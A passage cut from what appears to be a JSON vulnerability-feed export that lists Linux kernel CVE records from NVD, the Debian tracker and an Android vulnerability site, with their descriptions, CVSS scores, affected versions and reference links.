"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1420", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.18.9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T10:11:28", "description": "The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via multiple \"keyctl newring\" operations followed by a \"keyctl timeout\" operation.", "cvss3": {}, "published": "2014-09-28T10:55:00", "type": "cve", "title": "CVE-2014-3631", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3631"], "modified": "2023-02-13T00:41:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.16.2"], "id": "CVE-2014-3631", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3631", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:31", "description": "An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be \"jumped\" over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010).", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T16:29:00", "type": "cve", "title": "CVE-2017-1000364", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000364"], "modified": "2018-10-18T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.11.5"], "id": "CVE-2017-1000364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000364", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.11.5:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-05-27T15:14:27", "description": "An issue was discovered in the Linux kernel through 4.17.10. There is a NULL pointer dereference in fscrypt_do_page_crypto() in fs/crypto/crypto.c when operating on a file in a corrupted f2fs image.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-27T04:29:00", "type": "debiancve", "title": "CVE-2018-14616", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14616"], "modified": "2018-07-27T04:29:00", "id": "DEBIANCVE:CVE-2018-14616", "href": "https://security-tracker.debian.org/tracker/CVE-2018-14616", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-27T15:14:25", "description": "The nfnetlink_rcv_batch function in net/netfilter/nfnetlink.c in the Linux kernel before 4.5 does not check whether a batch message's length field is large enough, which allows local users to obtain sensitive information from kernel memory or cause a denial of service (infinite loop or out-of-bounds read) by leveraging the CAP_NET_ADMIN capability.", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.0, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-11-16T05:59:00", "type": "debiancve", "title": "CVE-2016-7917", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7917"], "modified": "2016-11-16T05:59:00", "id": "DEBIANCVE:CVE-2016-7917", "href": "https://security-tracker.debian.org/tracker/CVE-2016-7917", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-28T03:20:25", "description": "The __ext4_journal_stop function in fs/ext4/ext4_jbd2.c in the Linux kernel before 4.3.3 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging improper access to a certain error field.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-16T05:59:00", "type": "debiancve", "title": "CVE-2015-8961", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8961"], "modified": "2016-11-16T05:59:00", "id": "DEBIANCVE:CVE-2015-8961", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8961", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:14:25", "description": "drivers/soc/qcom/qdsp6v2/voice_svc.c in the QDSP6v2 Voice Service driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a write request, as demonstrated by a voice_svc_send_req buffer overflow.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-10T10:59:00", "type": "debiancve", "title": "CVE-2016-5343", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5343"], "modified": "2016-10-10T10:59:00", "id": "DEBIANCVE:CVE-2016-5343", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5343", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:14:27", "description": "The LLC subsystem in the Linux kernel before 4.9.13 does not ensure that a certain destructor exists in required circumstances, which allows local users to cause a denial of service (BUG_ON) or possibly have unspecified other impact via crafted system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-01T20:59:00", "type": "debiancve", "title": "CVE-2017-6345", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6345"], "modified": "2017-03-01T20:59:00", "id": "DEBIANCVE:CVE-2017-6345", "href": "https://security-tracker.debian.org/tracker/CVE-2017-6345", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-26T14:32:29", "description": "Buffer overflow in the oz_cdev_write function in drivers/staging/ozwpan/ozcdev.c in the Linux kernel before 3.12 allows local users to cause a denial of service or possibly have unspecified other impact via a crafted write operation.", "cvss3": {}, "published": "2013-11-12T14:35:00", "type": "debiancve", "title": "CVE-2013-4513", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4513"], "modified": "2013-11-12T14:35:00", "id": "DEBIANCVE:CVE-2013-4513", "href": "https://security-tracker.debian.org/tracker/CVE-2013-4513", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-28T03:20:25", "description": "The aiptek_probe function in drivers/input/tablet/aiptek.c in the Linux kernel before 4.4 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device that lacks endpoints.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2015-7515", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7515"], "modified": "2016-04-27T17:59:00", "id": "DEBIANCVE:CVE-2015-7515", "href": "https://security-tracker.debian.org/tracker/CVE-2015-7515", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-26T14:32:29", "description": "Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value.", "cvss3": {}, "published": "2013-12-14T18:08:00", "type": "debiancve", "title": "CVE-2013-4587", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4587"], "modified": "2013-12-14T18:08:00", "id": "DEBIANCVE:CVE-2013-4587", "href": "https://security-tracker.debian.org/tracker/CVE-2013-4587", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:14:23", "description": "The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application that reads a TLS base address.", "cvss3": {}, "published": "2014-12-26T00:59:00", "type": "debiancve", "title": "CVE-2014-9419", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2014-12-26T00:59:00", "id": "DEBIANCVE:CVE-2014-9419", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9419", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-28T03:20:25", "description": "The sco_sock_bind function in net/bluetooth/sco.c in the Linux kernel before 4.3.4 does not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-08T03:59:00", "type": "debiancve", "title": "CVE-2015-8575", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8575"], "modified": "2016-02-08T03:59:00", "id": "DEBIANCVE:CVE-2015-8575", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8575", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:14:25", "description": "Race condition in the snd_pcm_period_elapsed function in sound/core/pcm_lib.c in the ALSA subsystem in the Linux kernel before 4.7 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted SNDRV_PCM_TRIGGER_START command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-28T07:59:00", "type": "debiancve", "title": "CVE-2016-9794", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9794"], "modified": "2016-12-28T07:59:00", "id": "DEBIANCVE:CVE-2016-9794", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:14:25", "description": "The tipc_nl_compat_link_dump function in net/tipc/netlink_compat.c in the Linux kernel through 4.6.3 does not properly copy a certain string, which allows local users to obtain sensitive information from kernel stack memory by reading a Netlink message.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-06-27T10:59:00", "type": "debiancve", "title": "CVE-2016-5243", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5243"], "modified": "2016-06-27T10:59:00", "id": "DEBIANCVE:CVE-2016-5243", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5243", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:14:22", "description": "The snd_ctl_elem_add function in sound/core/control.c in the ALSA control implementation in the Linux kernel before 3.15.2 does not properly maintain the user_ctl_count value, which allows local users to cause a denial of service (integer overflow and limit bypass) by leveraging /dev/snd/controlCX access for a large number of SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl calls.", "cvss3": {}, "published": "2014-07-03T04:22:00", "type": "debiancve", "title": "CVE-2014-4655", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4655"], "modified": "2014-07-03T04:22:00", "id": "DEBIANCVE:CVE-2014-4655", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4655", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-27T15:14:25", "description": "sound/core/timer.c in the Linux kernel through 4.6 does not initialize certain r1 data structures, which allows local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-23T10:59:00", "type": "debiancve", "title": "CVE-2016-4578", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4578"], "modified": "2016-05-23T10:59:00", "id": "DEBIANCVE:CVE-2016-4578", "href": "https://security-tracker.debian.org/tracker/CVE-2016-4578", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-28T03:20:25", "description": "Race condition in the handle_to_path function in fs/fhandle.c in the Linux kernel through 3.19.1 allows local users to bypass intended size restrictions and trigger read operations on additional memory locations by changing the handle_bytes value of a file handle during the execution of this function.", "cvss3": {}, "published": "2015-03-16T10:59:00", "type": "debiancve", "title": "CVE-2015-1420", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1420"], "modified": "2015-03-16T10:59:00", "id": "DEBIANCVE:CVE-2015-1420", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1420", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-28T10:10:47", "description": "The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3 does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via multiple \"keyctl newring\" operations followed by a \"keyctl timeout\" operation.", "cvss3": {}, "published": "2014-09-28T10:55:00", "type": "debiancve", "title": "CVE-2014-3631", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3631"], "modified": "2014-09-28T10:55:00", "id": "DEBIANCVE:CVE-2014-3631", "href": "https://security-tracker.debian.org/tracker/CVE-2014-3631", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2021-07-28T14:34:38", "description": "The __ext4_journal_stop function in fs/ext4/ext4_jbd2.c in the Linux kernel before 4.3.3 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging improper access to a certain error field.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-01T00:00:00", "type": "android", "title": "CVE-2015-8961", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8961"], "modified": "2019-07-29T00:00:00", "id": "ANDROID:CVE-2015-8961", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2015-8961.html", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:36", "description": "Race condition in the snd_pcm_period_elapsed function in sound/core/pcm_lib.c in the ALSA subsystem in the Linux kernel before 4.7 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted SNDRV_PCM_TRIGGER_START command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-01T00:00:00", "type": "android", "title": "CVE-2016-9794", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 